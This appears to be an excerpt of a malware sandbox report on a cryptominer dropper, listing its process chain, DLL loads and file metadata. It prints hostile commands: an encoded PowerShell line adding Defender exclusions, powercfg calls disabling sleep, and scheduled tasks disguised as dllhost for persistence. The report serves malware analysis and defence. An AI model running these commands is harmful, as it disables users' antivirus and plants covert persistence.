                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA=="
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Users\user\Desktop\PqSIlYOaIF.exe "C:\Users\user\Desktop\PqSIlYOaIF.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe "C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA=="
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: PqSIlYOaIF.exeStatic file information: File size 1250816 > 1048576
                  Source: PqSIlYOaIF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.dr
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,9_2_00402665
                  Source: PqSIlYOaIF.exeStatic PE information: real checksum: 0x0 should be: 0x1408d5
                  Source: 7z.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                  Source: 7z.dll.9.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                  Source: winlogson.exe.28.drStatic PE information: real checksum: 0x7e7c4c should be: 0x30bd3
                  Source: Installer.exe.24.drStatic PE information: real checksum: 0x3425e should be: 0xa3dbd
